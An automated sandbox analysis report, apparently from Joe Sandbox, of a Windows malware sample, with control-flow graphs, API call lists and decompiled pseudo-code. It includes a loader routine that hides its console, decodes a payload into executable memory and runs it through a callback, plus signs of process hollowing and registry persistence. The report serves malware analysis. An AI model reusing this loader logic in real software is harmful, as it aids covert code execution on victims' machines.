408e4d 8139->8142 8143 408e74 MultiByteToWideChar 8142->8143 8144 408e67 8142->8144 8145 408e99 8143->8145 8147 408ea0 8143->8147 8144->8143 8146 40412d __cftof_l 6 API calls 8145->8146 8148 408f41 8146->8148 8150 407fe3 _malloc 55 API calls 8147->8150 8153 408ec2 _memset __crtGetStringTypeA_stat 8147->8153 8148->8128 8149 408efe MultiByteToWideChar 8151 408f28 8149->8151 8152 408f18 GetStringTypeW 8149->8152 8150->8153 8155 408e2f 8151->8155 8152->8151 8153->8145 8153->8149 8156 408e39 8155->8156 8158 408e4a 8155->8158 8157 404535 _free 55 API calls 8156->8157 8156->8158 8157->8158 8158->8145 8161 408bfe MultiByteToWideChar 8159->8161 8162 408c5d 8161->8162 8165 408c64 8161->8165 8163 40412d __cftof_l 6 API calls 8162->8163 8166 408de5 8163->8166 8164 408cc3 MultiByteToWideChar 8167 408cdc 8164->8167 8178 408d2a 8164->8178 8170 407fe3 _malloc 55 API calls 8165->8170 8172 408c8c __crtGetStringTypeA_stat 8165->8172 8166->8121 8184 409037 8167->8184 8169 408e2f __freea 55 API calls 8169->8162 8170->8172 8171 408cf0 8173 408d32 8171->8173 8174 408d06 8171->8174 8171->8178 8172->8162 8172->8164 8175 408d5a __crtGetStringTypeA_stat 8173->8175 8180 407fe3 _malloc 55 API calls 8173->8180 8176 409037 ___crtLCMapStringW LCMapStringW 8174->8176 8174->8178 8177 409037 ___crtLCMapStringW LCMapStringW 8175->8177 8175->8178 8176->8178 8179 408d9d 8177->8179 8178->8169 8181 408dc5 8179->8181 8183 408db7 WideCharToMultiByte 8179->8183 8180->8175 8182 408e2f __freea 55 API calls 8181->8182 8182->8178 8183->8181 8185 409062 ___crtLCMapStringW 8184->8185 8186 409047 8184->8186 8187 409079 LCMapStringW 8185->8187 8186->8171 8187->8171 8189 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8188->8189 8190 40b5d2 8189->8190 8191 40b5e9 8190->8191 8192 40c2fc __isctype_l 58 API calls 8190->8192 8191->8095 8192->8191 8520 408fb6 8521 403128 __lock 55 API calls 8520->8521 8522 408fbd 8521->8522 8523 401637 8524 401646 8523->8524 8525 40164c 8523->8525 8526 4031e6 _raise 55 API calls 8524->8526 8529 403144 8525->8529 8526->8525 8528 401651 __wfsopen 8530 40329c _doexit 55 API calls 8529->8530 8531 40314f 8530->8531 8531->8528 8532 4064b7 8535 406813 8532->8535 8534 4064c6 8536 40681f __wfsopen 8535->8536 8537 402f11 __write_nolock 55 API calls 8536->8537 8538 406827 8537->8538 8539 40676d _LocaleUpdate::_LocaleUpdate 55 API calls 8538->8539 8540 406831 8539->8540 8560 40650e 8540->8560 8543 4045b5 __malloc_crt 55 API calls 8544 406853 8543->8544 8545 406980 __wfsopen 8544->8545 8567 4069bb 8544->8567 8545->8534 8548 406990 8548->8545 8551 4069a3 8548->8551 8554 404535 _free 55 API calls 8548->8554 8549 406889 8550 4068a9 8549->8550 8553 404535 _free 55 API calls 8549->8553 8550->8545 8555 4043b6 __lock 55 API calls 8550->8555 8552 4024c9 __wfsopen 55 API calls 8551->8552 8552->8545 8553->8550 8554->8551 8556 4068d8 8555->8556 8557 406966 8556->8557 8559 404535 _free 55 API calls 8556->8559 8577 406985 8557->8577 8559->8557 8561 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8560->8561 8562 40651e 8561->8562 8563 40652d GetOEMCP 8562->8563 8564 40653f 8562->8564 8565 406556 8563->8565 8564->8565 8566 406544 GetACP 8564->8566 8565->8543 8565->8545 8566->8565 8568 40650e getSystemCP 57 API calls 8567->8568 8569 4069d8 8568->8569 8572 406a29 IsValidCodePage 8569->8572 8574 4069df setSBCS 8569->8574 8575 406a4e _memset __setmbcp_nolock 8569->8575 8570 40412d __cftof_l 6 API calls 8571 40687a 8570->8571 8571->8548 8571->8549 8573 406a3b GetCPInfo 8572->8573 8572->8574 8573->8574 8573->8575 8574->8570 8580 4065db GetCPInfo 8575->8580 8590 404520 LeaveCriticalSection 8577->8590 8579 40698c 8579->8545 8581 4066bd 8580->8581 8585 406613 8580->8585 8584 40412d __cftof_l 6 API calls 8581->8584 8582 408f45 ___crtGetStringTypeA 58 API calls 8583 406674 8582->8583 8586 408de9 ___crtLCMapStringA 59 API calls 8583->8586 8587 406769 8584->8587 8585->8582 8588 406695 8586->8588 8587->8574 8589 408de9 ___crtLCMapStringA 59 API calls 8588->8589 8589->8581 8590->8579 8591 40613b 8592 40613e 8591->8592 8593 4086bf _abort 57 API calls 8592->8593 8594 40614a 8593->8594 8595 4093bc 8596 4093d2 8595->8596 8597 4093c6 8595->8597 8597->8596 8598 4093cb CloseHandle 8597->8598 8598->8596

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 62 9f03f8-9f04e3 GetPEB call 9f07a4 * 7 call 9f0772 CreateFileW 79 9f05cd 62->79 80 9f04e9-9f04f3 62->80 81 9f05cf-9f05d3 79->81 85 9f05c9-9f05cb 80->85 86 9f04f9-9f0509 VirtualAlloc 80->86 83 9f05fc-9f0600 81->83 84 9f05d5-9f05d7 81->84 87 9f05e4-9f05e9 83->87 88 9f0602-9f0607 83->88 89 9f05dd-9f05e2 84->89 90 9f05d9 84->90 96 9f05c4-9f05c7 85->96 86->85 93 9f050f-9f051e ReadFile 86->93 91 9f05eb-9f05f0 87->91 92 9f05f2-9f05f4 87->92 94 9f0609-9f0611 VirtualFree 88->94 95 9f0614-9f061a 88->95 89->83 90->89 91->83 98 9f05fa 92->98 99 9f05f6-9f05f8 92->99 93->85 100 9f0524-9f0545 VirtualAlloc 93->100 94->95 96->81 98->83 99->83 101 9f0547-9f055c call 9f070b 100->101 102 9f05c2 100->102 105 9f055e-9f0567 101->105 106 9f0593-9f05a7 call 9f07a4 101->106 102->96 107 9f056a-9f0591 call 9f070b 105->107 106->81 112 9f05a9-9f05ab 106->112 107->106 113 9f05ad-9f05ae FindCloseChangeNotification 112->113 114 9f05b1-9f05c0 VirtualFree 112->114 113->114 114->96
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F04DB
                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 009F0502
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 009F0519
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 009F053D
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?), ref: 009F05AE
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 009F05B9
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 009F0611
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                          • String ID:
                                                          • API String ID: 656311269-0
                                                          • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction ID: ab001c7450f0ffadd3c02436053da81a5904454c7c152ade357866f06239c13e
                                                          • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction Fuzzy Hash: 52617075E102189BCF10DBA5D884BBEBBB9AFC8710F148459FA05EB292D7B49D01CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 009F12DA
                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 009F12FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: ContextCreateProcessThread
                                                          • String ID: D
                                                          • API String ID: 2843130473-2746444292
                                                          • Opcode ID: 084e3f6b5054627029af3637fd3af2668ceac509277eee27f3ede2b51cd7b44c
                                                          • Instruction ID: a7b549137a2df3ba946ac0a1e798d9644de3e5355b5efd94d6ea27ab08c55a9c
                                                          • Opcode Fuzzy Hash: 084e3f6b5054627029af3637fd3af2668ceac509277eee27f3ede2b51cd7b44c
                                                          • Instruction Fuzzy Hash: 39A1F470E0010DEFDB44DFA5C985BAEBBB9BF88304F1044A5E615EB291D774AA41DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 115 9f1a5c-9f1b54 call 9f06f7 call 9f07a4 * 8 PathFileExistsW 135 9f1b56-9f1b59 115->135 136 9f1b63-9f1b82 CreateFileW 115->136 137 9f1c2b-9f1c2c 135->137 138 9f1b8b-9f1b9a 136->138 139 9f1b84-9f1b86 136->139 141 9f1b9c-9f1b9e 138->141 142 9f1ba3-9f1bbd VirtualAlloc 138->142 139->137 141->137 143 9f1bbf-9f1bc1 142->143 144 9f1bc3-9f1bd7 ReadFile 142->144 143->137 145 9f1bdd-9f1c16 FindCloseChangeNotification CreateFileW WriteFile 144->145 146 9f1bd9-9f1bdb 144->146 147 9f1c18-9f1c20 145->147 148 9f1c22-9f1c2a 145->148 146->137 147->137 148->137
                                                          APIs
                                                          • PathFileExistsW.KERNELBASE(00000000), ref: 009F1B4E
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F1B78
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: File$CreateExistsPath
                                                          • String ID:
                                                          • API String ID: 2955419453-0
                                                          • Opcode ID: 211326630d16dbdff14aa4ac5dfa0c09c8d768efed6170e790a4e827189436b4
                                                          • Instruction ID: a922a11ed648b39b00abce2bf8f3b5753751050bdf73d7dc11bb0ea8438309af
                                                          • Opcode Fuzzy Hash: 211326630d16dbdff14aa4ac5dfa0c09c8d768efed6170e790a4e827189436b4
                                                          • Instruction Fuzzy Hash: 8B513730E5024CEFDF10EBA0DD06BBEBBB9AF88711F204855E211FA2A0D7715A41DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 9f0809-9f0b3f call 9f06f7 call 9f07a4 * 10 CreateFileW 177 9f0b46-9f0b58 151->177 178 9f0b41 151->178 181 9f0b5c-9f0b75 VirtualAlloc 177->181 182 9f0b5a 177->182 179 9f0bcf-9f0bd0 178->179 183 9f0b79-9f0b93 ReadFile 181->183 184 9f0b77 181->184 182->179 185 9f0b97-9f0bc9 FindCloseChangeNotification call 9f0bd1 call 9f145c call 9f0e70 ExitProcess 183->185 186 9f0b95 183->186 184->179 186->179
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F0B32
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 46973cb8bccfb190590f14ff869c6600a5f73baddf4e3c97e105d0705c82c931
                                                          • Instruction ID: 792fd6463cd1f3d43c66aae17fa9371263b3a06d662135cc6e84cd210f997f0c
                                                          • Opcode Fuzzy Hash: 46973cb8bccfb190590f14ff869c6600a5f73baddf4e3c97e105d0705c82c931
                                                          • Instruction Fuzzy Hash: ACC10125E50348A9DB60DBE4EC52BBDB7B5AF84B10F205497E608EE2E1D7711E80DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 193 4011bc-4011d5 194 4011f2 193->194 195 4011d7-4011dc 193->195 196 4011f4-4011fa 194->196 195->194 197 4011de-4011e0 195->197 198 4011e2-4011e7 call 4024c9 197->198 199 4011fb-401200 197->199 211 4011ed call 4017ee 198->211 200 401202-40120c 199->200 201 40120e-401212 199->201 200->201 203 401232-401241 200->203 204 401222-401224 201->204 205 401214-40121f call 401b60 201->205 209 401243-401246 203->209 210 401248 203->210 204->198 208 401226-401230 204->208 205->204 208->198 208->203 213 40124d-401252 209->213 210->213 211->194 215 401258-40125f 213->215 216 40133b-40133e 213->216 217 4012a0-4012a2 215->217 218 401261-401269 215->218 216->196 220 4012a4-4012a6 217->220 221 40130c-40130d call 401829 217->221 218->217 219 40126b 218->219 222 401271-401273 219->222 223 401369 219->223 224 4012a8-4012b0 220->224 225 4012ca-4012d5 220->225 232 401312-401316 221->232 227 401275-401277 222->227 228 40127a-40127f 222->228 229 40136d-401376 223->229 230 4012c0-4012c4 224->230 231 4012b2-4012be 224->231 233 4012d7 225->233 234 4012d9-4012dc 225->234 227->228 235 401343-401347 228->235 237 401285-40129e call 401ade 228->237 229->196 238 4012c6-4012c8 230->238 231->238 232->229 239 401318-40131d 232->239 233->234 234->235 236 4012de-4012ea call 40194a call 401d04 234->236 240 401359-401364 call 4024c9 235->240 241 401349-401356 call 401b60 235->241 254 4012ef-4012f4 236->254 253 401301-40130a 237->253 238->234 239->235 244 40131f-401330 239->244 240->211 241->240 249 401333-401335 244->249 249->215 249->216 253->249 255 4012fa-4012fd 254->255 256 40137b-40137f 254->256 255->223 257 4012ff 255->257 256->229 257->253
                                                          C-Code - Quality: 69%
                                                          			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t74;
                                                          				signed int _t78;
                                                          				char _t81;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				signed int _t94;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				char* _t99;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				char* _t110;
                                                          				signed int _t113;
                                                          				signed int _t117;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t99 = _a4;
                                                          				_t74 = _a8;
                                                          				_v8 = _t99;
                                                          				_v12 = _t74;
                                                          				if(_a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t97 = _a16;
                                                          				if(_t97 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_t99 != 0) {
                                                          					_t119 = _a20;
                                                          					__eflags = _t119;
                                                          					if(_t119 == 0) {
                                                          						L9:
                                                          						__eflags = _a8 - 0xffffffff;
                                                          						if(_a8 != 0xffffffff) {
                                                          							_t74 = E00401B60(_t99, 0, _a8);
                                                          							_t120 = _t120 + 0xc;
                                                          						}
                                                          						__eflags = _t119;
                                                          						if(_t119 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t78 = _t74 | 0xffffffff;
                                                          							__eflags = _t97 - _t78 / _a12;
                                                          							if(_t97 > _t78 / _a12) {
                                                          								goto L3;
                                                          							}
                                                          							L13:
                                                          							_t117 = _a12 * _t97;
                                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          							_t98 = _t117;
                                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          								_t100 = 0x1000;
                                                          							} else {
                                                          								_t100 =  *(_t119 + 0x18);
                                                          							}
                                                          							_v16 = _t100;
                                                          							__eflags = _t117;
                                                          							if(_t117 == 0) {
                                                          								L41:
                                                          								return _a16;
                                                          							} else {
                                                          								do {
                                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          										L24:
                                                          										__eflags = _t98 - _t100;
                                                          										if(_t98 < _t100) {
                                                          											_t81 = E00401829(_t98, _t119, _t119); // executed
                                                          											__eflags = _t81 - 0xffffffff;
                                                          											if(_t81 == 0xffffffff) {
                                                          												L46:
                                                          												return (_t117 - _t98) / _a12;
                                                          											}
                                                          											_t102 = _v12;
                                                          											__eflags = _t102;
                                                          											if(_t102 == 0) {
                                                          												L42:
                                                          												__eflags = _a8 - 0xffffffff;
                                                          												if(_a8 != 0xffffffff) {
                                                          													E00401B60(_a4, 0, _a8);
                                                          												}
                                                          												 *((intOrPtr*)(E004024C9())) = 0x22;
                                                          												L4:
                                                          												E004017EE();
                                                          												goto L5;
                                                          											}
                                                          											_t110 = _v8;
                                                          											 *_t110 = _t81;
                                                          											_t98 = _t98 - 1;
                                                          											_v8 = _t110 + 1;
                                                          											_t103 = _t102 - 1;
                                                          											__eflags = _t103;
                                                          											_v12 = _t103;
                                                          											_t100 =  *(_t119 + 0x18);
                                                          											_v16 = _t100;
                                                          											goto L40;
                                                          										}
                                                          										__eflags = _t100;
                                                          										if(_t100 == 0) {
                                                          											_t86 = 0x7fffffff;
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t86 = _t98;
                                                          											}
                                                          										} else {
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t44 = _t98 % _t100;
                                                          												__eflags = _t44;
                                                          												_t113 = _t44;
                                                          												_t91 = _t98;
                                                          											} else {
                                                          												_t113 = 0x7fffffff % _t100;
                                                          												_t91 = 0x7fffffff;
                                                          											}
                                                          											_t86 = _t91 - _t113;
                                                          										}
                                                          										__eflags = _t86 - _v12;
                                                          										if(_t86 > _v12) {
                                                          											goto L42;
                                                          										} else {
                                                          											_push(_t86);
                                                          											_push(_v8);
                                                          											_push(E0040194A(_t119)); // executed
                                                          											_t88 = E00401D04(); // executed
                                                          											_t120 = _t120 + 0xc;
                                                          											__eflags = _t88;
                                                          											if(_t88 == 0) {
                                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                          												goto L46;
                                                          											}
                                                          											__eflags = _t88 - 0xffffffff;
                                                          											if(_t88 == 0xffffffff) {
                                                          												L45:
                                                          												_t64 = _t119 + 0xc;
                                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                          												__eflags =  *_t64;
                                                          												goto L46;
                                                          											}
                                                          											_t98 = _t98 - _t88;
                                                          											__eflags = _t98;
                                                          											L36:
                                                          											_v8 = _v8 + _t88;
                                                          											_v12 = _v12 - _t88;
                                                          											_t100 = _v16;
                                                          											goto L40;
                                                          										}
                                                          									}
                                                          									_t94 =  *(_t119 + 4);
                                                          									_v20 = _t94;
                                                          									__eflags = _t94;
                                                          									if(__eflags == 0) {
                                                          										goto L24;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										goto L45;
                                                          									}
                                                          									__eflags = _t98 - _t94;
                                                          									if(_t98 < _t94) {
                                                          										_t94 = _t98;
                                                          										_v20 = _t98;
                                                          									}
                                                          									_t104 = _v12;
                                                          									__eflags = _t94 - _t104;
                                                          									if(_t94 > _t104) {
                                                          										goto L42;
                                                          									} else {
                                                          										E00401ADE(_v8, _t104,  *_t119, _t94);
                                                          										_t88 = _v20;
                                                          										_t120 = _t120 + 0x10;
                                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                          										_t98 = _t98 - _t88;
                                                          										 *_t119 =  *_t119 + _t88;
                                                          										goto L36;
                                                          									}
                                                          									L40:
                                                          									__eflags = _t98;
                                                          								} while (_t98 != 0);
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                                          					__eflags = _t97 - _t74;
                                                          					if(_t97 <= _t74) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				L3:
                                                          				 *((intOrPtr*)(E004024C9())) = 0x16;
                                                          				goto L4;
                                                          			}




























                                                          0x004011c6
                                                          0x004011c9
                                                          0x004011cf
                                                          0x004011d2
                                                          0x004011d5
                                                          0x004011f2
                                                          0x00000000
                                                          0x004011f2
                                                          0x004011d7
                                                          0x004011dc
                                                          0x00000000
                                                          0x00000000
                                                          0x004011e0
                                                          0x004011fb
                                                          0x004011fe
                                                          0x00401200
                                                          0x0040120e
                                                          0x0040120e
                                                          0x00401212
                                                          0x0040121a
                                                          0x0040121f
                                                          0x0040121f
                                                          0x00401222
                                                          0x00401224
                                                          0x00000000
                                                          0x00401226
                                                          0x00401226
                                                          0x0040122e
                                                          0x00401230
                                                          0x00000000
                                                          0x00000000
                                                          0x00401232
                                                          0x00401235
                                                          0x00401238
                                                          0x0040123f
                                                          0x00401241
                                                          0x00401248
                                                          0x00401243
                                                          0x00401243
                                                          0x00401243
                                                          0x0040124d
                                                          0x00401250
                                                          0x00401252
                                                          0x0040133b
                                                          0x00000000
                                                          0x00401258
                                                          0x00401258
                                                          0x00401258
                                                          0x0040125f
                                                          0x004012a0
                                                          0x004012a0
                                                          0x004012a2
                                                          0x0040130d
                                                          0x00401313
                                                          0x00401316
                                                          0x0040136d
                                                          0x00000000
                                                          0x00401373
                                                          0x00401318
                                                          0x0040131b
                                                          0x0040131d
                                                          0x00401343
                                                          0x00401343
                                                          0x00401347
                                                          0x00401351
                                                          0x00401356
                                                          0x0040135e
                                                          0x004011ed
                                                          0x004011ed
                                                          0x00000000
                                                          0x004011ed
                                                          0x0040131f
                                                          0x00401322
                                                          0x00401325
                                                          0x00401326
                                                          0x00401329
                                                          0x00401329
                                                          0x0040132a
                                                          0x0040132d
                                                          0x00401330
                                                          0x00000000
                                                          0x00401330
                                                          0x004012a4
                                                          0x004012a6
                                                          0x004012ca
                                                          0x004012cf
                                                          0x004012d5
                                                          0x004012d7
                                                          0x004012d7
                                                          0x004012a8
                                                          0x004012aa
                                                          0x004012b0
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c4
                                                          0x004012b2
                                                          0x004012b7
                                                          0x004012b9
                                                          0x004012b9
                                                          0x004012c6
                                                          0x004012c6
                                                          0x004012d9
                                                          0x004012dc
                                                          0x00000000
                                                          0x004012de
                                                          0x004012de
                                                          0x004012df
                                                          0x004012e9
                                                          0x004012ea
                                                          0x004012ef
                                                          0x004012f2
                                                          0x004012f4
                                                          0x0040137b
                                                          0x00000000
                                                          0x0040137b
                                                          0x004012fa
                                                          0x004012fd
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00000000
                                                          0x00401369
                                                          0x004012ff
                                                          0x004012ff
                                                          0x00401301
                                                          0x00401301
                                                          0x00401304
                                                          0x00401307
                                                          0x00000000
                                                          0x00401307
                                                          0x004012dc
                                                          0x00401261
                                                          0x00401264
                                                          0x00401267
                                                          0x00401269
                                                          0x00000000
                                                          0x00000000
                                                          0x0040126b
                                                          0x00000000
                                                          0x00000000
                                                          0x00401271
                                                          0x00401273
                                                          0x00401275
                                                          0x00401277
                                                          0x00401277
                                                          0x0040127a
                                                          0x0040127d
                                                          0x0040127f
                                                          0x00000000
                                                          0x00401285
                                                          0x0040128c
                                                          0x00401291
                                                          0x00401294
                                                          0x00401297
                                                          0x0040129a
                                                          0x0040129c
                                                          0x00000000
                                                          0x0040129c
                                                          0x00401333
                                                          0x00401333
                                                          0x00401333
                                                          0x00000000
                                                          0x00401258
                                                          0x00401252
                                                          0x00401224
                                                          0x00401207
                                                          0x0040120a
                                                          0x0040120c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040120c
                                                          0x004011e2
                                                          0x004011e7
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 44d23312960692a40431b7708105da528cbf403d5d2f38dda23801874c8e3369
                                                          • Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
                                                          • Opcode Fuzzy Hash: 44d23312960692a40431b7708105da528cbf403d5d2f38dda23801874c8e3369
                                                          • Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 79%
                                                          			E00401000(struct HWND__* __eax, intOrPtr _a8) {
                                                          				void* _t8;
                                                          				_Unknown_base(*)()* _t9;
                                                          				_Unknown_base(*)()* _t20;
                                                          				void* _t23;
                                                          
                                                          				_t23 = 0;
                                                          				__imp__GetConsoleWindow(); // executed
                                                          				ShowWindow(__eax, 0); // executed
                                                          				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000); // executed
                                                          				_t9 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40); // executed
                                                          				_t20 = _t9;
                                                          				E00401381(_t20, 0x1c32, 1, _t8); // executed
                                                          				do {
                                                          					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
                                                          					_t23 = _t23 + 1;
                                                          				} while (_t23 < 0x1c32);
                                                          				EnumSystemCodePagesW(_t20, 0); // executed
                                                          				return 0;
                                                          			}







                                                          0x00401006
                                                          0x00401009
                                                          0x00401010
                                                          0x00401021
                                                          0x00401037
                                                          0x00401045
                                                          0x00401049
                                                          0x00401051
                                                          0x00401060
                                                          0x00401063
                                                          0x00401064
                                                          0x0040106b
                                                          0x00401077

                                                          APIs
                                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
                                                          • ShowWindow.USER32(00000000), ref: 00401010
                                                            • Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438
                                                          • VirtualAlloc.KERNELBASE(00000000,00001C32,00003000,00000040), ref: 00401037
                                                          • __fread_nolock.LIBCMT ref: 00401049
                                                          • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 0040106B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
                                                          • String ID:
                                                          • API String ID: 2083855422-0
                                                          • Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
                                                          • Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
                                                          • Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 265 9f145c-9f1810 call 9f06f7 call 9f07a4 * 11 296 9f1813-9f1817 265->296 297 9f182f-9f1846 296->297 298 9f1819-9f182d 296->298 300 9f184f-9f185e 297->300 301 9f1848-9f184a 297->301 298->296 304 9f1867-9f188a 300->304 305 9f1860-9f1862 300->305 302 9f1996-9f1997 301->302 308 9f188c-9f188e 304->308 309 9f1893-9f18a9 304->309 305->302 308->302 311 9f18ab-9f18ad 309->311 312 9f18b2-9f18c8 309->312 311->302 314 9f18da-9f18e8 call 9f199a 312->314 315 9f18ca-9f18d5 312->315 319 9f18ea-9f18ec 314->319 320 9f18f1-9f1906 call 9f1a5c 314->320 315->302 319->302 323 9f190f-9f1936 RegGetValueW 320->323 324 9f1908-9f190a 320->324 325 9f193c-9f1960 RegOpenKeyExW 323->325 326 9f1938-9f193a 323->326 324->302 327 9f1964-9f1987 RegSetValueExW 325->327 328 9f1962 325->328 326->302 329 9f198d 327->329 330 9f1989-9f198b 327->330 328->323 329->302 330->302
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
